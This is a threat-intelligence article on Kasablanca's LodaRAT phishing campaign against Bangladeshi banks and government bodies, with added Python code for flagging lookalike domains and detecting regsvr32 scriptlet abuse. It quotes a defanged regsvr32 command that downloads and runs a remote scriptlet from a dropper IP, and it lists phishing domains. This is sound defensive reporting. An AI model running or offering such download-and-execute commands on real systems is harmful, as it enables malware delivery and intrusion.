Kasablanca targets financial and government organizations in Bangladesh

March 1, 2021
Kasablanca Bangladesh Bank Government LodaRAT malware trojan

In October 2020, the threat actor Kasablanca attacked banks and carrier-grade voice-over-IP software vendors in order to distribute malware droppers. Recently, the e-Government Computer Incident Response Team (e-Gov CIRT) warned local financial and government organizations in Bangladesh of an ongoing attack from Kasablanca, for which it has identified a total of 18 phishing websites. The e-Gov CIRT is responsible for securing Bangladesh’s cyberspace, and as part of its mandate to review, respond to and provide guidance on security threats and vulnerabilities affecting Bangladesh government organizations, it has already notified the Bangladesh Telecommunication Regulatory Commission to block the malicious websites.
Seven of the identified phishing sites are patterned on the names of prominent Bangladesh government institutions. The phishing domains are:

  • Bkashagent[.]com
  • corona-bd[.]com
  • bkash[.]club
  • bdpolice[.]co
  • isiamibankbd[.]com
  • Bangladesh-bank[.]com
  • Bracbank[.]info
The threat actors aim to mislead users and harvest confidential information through these fake phishing websites.
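The domains listed above imitate real institutions by embedding a brand name or swapping a single character (for example, a lowercase L replaced by an i). The following added example, which is not part of the original article, shows one way a defender can triage such a list: each reported domain is stripped of its defanging, reduced to its leftmost label and compared against a watchlist of brand tokens. The watchlist itself is a constructed assumption derived from the institutions the article names, not an official list, and the threshold of 0.8 is a tuning choice.

```python
"""Lookalike-domain triage for the phishing domains reported above.

Added example, not from the original article. BRAND_TOKENS is an assumed
watchlist built from the institutions the article names; REPORTED_DOMAINS
are the defanged domains the article lists.
"""
from difflib import SequenceMatcher

# Domains exactly as the article lists them (defanged with [.]).
REPORTED_DOMAINS = [
    "Bkashagent[.]com",
    "corona-bd[.]com",
    "bkash[.]club",
    "bdpolice[.]co",
    "isiamibankbd[.]com",
    "Bangladesh-bank[.]com",
    "Bracbank[.]info",
]

# Assumed brand tokens for the institutions the article names (constructed watchlist).
BRAND_TOKENS = [
    "bkash",
    "bangladeshbank",
    "bracbank",
    "islamibankbd",
    "bdpolice",
    "corona",
]


def registrable_label(domain: str) -> str:
    """Undo [.] defanging, lowercase, take the leftmost label and drop hyphens.

    'Bangladesh-bank[.]com' -> 'bangladeshbank'
    """
    refanged = domain.lower().replace("[.]", ".")
    return refanged.split(".")[0].replace("-", "")


def lookalike_score(label: str, brand: str) -> float:
    """1.0 when the brand token is embedded verbatim; otherwise a character
    similarity ratio so single-character swaps (l -> i) still score high."""
    if brand in label:
        return 1.0
    return SequenceMatcher(None, label, brand).ratio()


def classify(domain: str, threshold: float = 0.8):
    """Return (closest brand token, rounded score, flagged?) for one domain."""
    label = registrable_label(domain)
    best = max(BRAND_TOKENS, key=lambda b: lookalike_score(label, b))
    score = lookalike_score(label, best)
    return best, round(score, 2), score >= threshold


def triage(domains=REPORTED_DOMAINS):
    """Classify every domain; returns a list of (domain, brand, score, flagged)."""
    return [(d, *classify(d)) for d in domains]


if __name__ == "__main__":
    for domain, brand, score, flagged in triage():
        print(f"{domain:25} -> {brand:15} score={score:.2f} flagged={flagged}")
```

The contains-check catches the domains that simply prepend or append text to a brand (bkashagent, corona-bd), while the similarity ratio catches the one-character substitution in isiamibankbd, which scores 0.92 against islamibankbd. A domain unrelated to any token on the watchlist stays below the threshold.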
Kasablanca targets the Bangladesh Bank, Bangladesh Police, bKash, BRAC Bank, Islami Bank Bangladesh, and Corona.gov.bd using hybrid campaigns (Windows and Android).
Kasablanca is the threat actor that developed LodaRAT, a remote access trojan that targets Android and Windows. Previously, LodaRAT was available only for Windows; the malware developers have since created an Android version and improved the capabilities of the Windows build. The first stage of the attack begins with a phishing email or SMS message sent to the victim that lures them into opening a malicious RTF document exploiting the Microsoft Office Memory Corruption Vulnerability (CVE-2017-11882). The malware bypasses Windows AppLocker by using the regsvr32 utility and runs the following command to download and execute a malicious SCT file; the scriptlet contains JavaScript that in turn downloads and executes the Loda binary.

Command: regsvr32 /s /u /n /i:hxxp://107[.]172[.]30[.]213/5.sct scrobj.dll
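The command above is a recognisable pattern in process-creation telemetry: a signed Windows binary (regsvr32) asked to load scrobj.dll with an /i: argument pointing at a remote scriptlet. The following added example, which is not from the original article, runs a small detection over constructed process-creation events in a simplified timestamp|image|commandline format (not a real product's log schema) and reports why each event was flagged. The only indicator taken from the article is the defanged dropper URL; the other sample lines are invented benign and test cases.

```python
"""Flag regsvr32 scriptlet-download activity in process-creation events.

Added example, not from the original article. Event format is a constructed
'timestamp|image|commandline' line; adapt the parsing to your own telemetry.
"""
import re
from dataclasses import dataclass, field

# Constructed sample events. The first line mirrors the article's command
# (defanged); the others are benign or partial cases used for contrast.
SAMPLE_EVENTS = [
    "2021-02-28T10:01:02Z|C:\\Windows\\System32\\regsvr32.exe|"
    "regsvr32 /s /u /n /i:hxxp://107[.]172[.]30[.]213/5.sct scrobj.dll",
    "2021-02-28T10:05:00Z|C:\\Windows\\System32\\regsvr32.exe|"
    "regsvr32 /s C:\\Program Files\\Vendor\\legit.dll",
    "2021-02-28T10:07:11Z|C:\\Windows\\System32\\notepad.exe|"
    "notepad C:\\Users\\a\\notes.txt",
    "2021-02-28T10:09:45Z|C:\\Windows\\SysWOW64\\REGSVR32.EXE|"
    "REGSVR32.EXE /s /i:HTTPS://EXAMPLE.INVALID/x.sct other.dll",
]

# /i: argument whose value is a URL rather than a local path.
REMOTE_INSTALL_ARG = re.compile(r'/i:\s*"?(?:https?|ftp)://', re.IGNORECASE)
# A .sct scriptlet referenced anywhere on the command line.
SCRIPTLET_REF = re.compile(r"\.sct\b", re.IGNORECASE)


@dataclass
class Finding:
    timestamp: str
    commandline: str
    reasons: list = field(default_factory=list)


def normalise(cmd: str) -> str:
    """Undo report-style defanging so one rule covers live and defanged input."""
    return cmd.replace("hxxp", "http").replace("[.]", ".")


def analyse_event(line: str):
    """Return a Finding for a suspicious regsvr32 event, else None."""
    timestamp, image, cmdline = line.split("|", 2)
    if not image.lower().endswith("regsvr32.exe"):
        return None  # only regsvr32 launches are in scope for this rule
    cmd = normalise(cmdline)
    reasons = []
    if "scrobj.dll" in cmd.lower():
        reasons.append("scrobj.dll loaded through regsvr32 (scriptlet execution)")
    if REMOTE_INSTALL_ARG.search(cmd):
        reasons.append("/i: argument points at a remote URL")
    if SCRIPTLET_REF.search(cmd):
        reasons.append(".sct scriptlet referenced on the command line")
    if reasons:
        return Finding(timestamp, cmdline, reasons)
    return None


def scan(lines):
    """Run analyse_event over every line and keep only the findings."""
    return [f for f in (analyse_event(line) for line in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding.timestamp, finding.commandline)
        for reason in finding.reasons:
            print("   -", reason)
```

Each reason is reported separately so an analyst can tune the rule: a remote /i: URL combined with scrobj.dll is the strongest signal, while a lone .sct reference or an ordinary local DLL registration (the second sample line) should not page anyone on its own.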

The latest version of Windows LodaRAT is 1.1.8 and uses a dropper site at the IP 107[.]172[.]30[.]213 that hosts the download scripts and payload. This version adds the ability for threat actors to remotely access the target machine over RDP (Remote Desktop Protocol) by changing Windows security settings. Another capability is an improved sound command that captures audio from a connected microphone for any recording length the threat actor specifies.

On the other hand, the Android version of LodaRAT (previously referred to as “Gaza007”) works as a stalker application. The malicious application can perform a wide range of tasks such as taking photos and screenshots, reading SMS and call logs, sending messages and placing calls to specific numbers, and recording the user’s location. The Android LodaRAT can also record audio calls, with the limitation that it captures only the targeted user’s side of the call and not the other party.

As of today, the identity of the espionage group remains unclear. Nevertheless, the threat actor mainly focuses on information gathering and is continuously evolving to target more users.
How to prevent these types of attacks?

Cyber attacks are frequent, and the difficulty of preventing and detecting them varies. The key pillars in preventing this kind of attack are educating employees and maintaining a healthy level of suspicion toward unsolicited email and SMS messages. Educating individuals about the attackers’ threat vectors raises awareness of the ongoing hybrid campaigns. At the same time, the organization should deploy and maintain layered security controls across the company’s network.